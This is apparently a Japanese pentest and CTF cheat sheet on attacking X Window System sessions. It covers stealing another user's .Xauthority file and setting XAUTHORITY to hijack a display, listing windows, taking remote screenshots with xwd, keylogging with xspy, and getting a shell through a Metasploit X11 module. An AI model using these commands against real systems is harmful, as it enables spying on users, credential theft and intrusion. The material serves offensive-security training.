x window system
X Windows Systemまわりを攻めるときのまとめ。
ログインしているユーザ一覧
どちらのコマンドも、上段がSSHアクセスのセッション、下段がGUI表示のセッションである。
$ w 16:31:36 up 10 min, 2 users, load average: 0.16, 0.03, 0.01USER TTY FROM LOGIN@ IDLE JCPU PCPU WHATmmash pts/0 10.0.0.1 16:21 0.00s 0.86s 0.01s wmmash tty7 :0 16:31 10:15 0.77s 0.20s xfce4-session
$ whommash pts/0 2023-01-22 16:21 (10.0.0.1)mmash tty7 2023-01-22 16:31 (:0)
.Xauthority
ファイル
Xセッションの認証のためのxauth
で使用されるクッキー内のクレデンシャルを格納するファイル。
他のユーザの.Xauthority
ファイルを窃取することで、Xセッションを乗っ取れる。
環境変数XAUTHORITY
.Xauthorityファイルのパスを環境変数XAUTHORITY
に格納することで、以降に紹介するXセッションを操作するコマンドの認証を突破することができる。
$ export XAUTHORITY=/path/to/.Xauthority
xdpinfo
あまり使える情報はないかもしれないけど、XAUTHORITY
を設定した状態で認証が通るかどうかはわかる。
$ xdpyinfo -display :0name of display: :0version number: 11.0vendor string: The X.Org Foundationvendor release number: 12101005X.Org version: 1.21.1.5maximum request size: 16777212 bytesmotion buffer size: 256bitmap unit, bit order, padding: 32, LSBFirst, 32image byte order: LSBFirstnumber of supported pixmap formats: 7...
xwininfo
起動しているウィンドウ一覧が出力される。ThunarはKaliに搭載されているファイルエクスプローラーの名前らしい。
$ xwininfo -root -tree -display :0... 0x1400007 "Documents - Thunar": ("Thunar" "Thunar") 640x480+5+31 +520+315...
HackTheBoxのSquashedではxwininfo
コマンドを叩いた結果が手掛かりになることがあった。
xwd
指定したディスプレイのスクリーンショットを撮る。
出力された.xwd
ファイルは。imagemagick
パッケージのconvert
コマンドでpngに変換できる。
$ xwd -root -screen -silent -display <target_addr:0> > screenshot.xwd$ convert screenshot.xwd screenshot.png
Keylogging
$ xspy <display_number>
Shell奪取
msf> use exploit/unix/x11/x11_keyboard_exec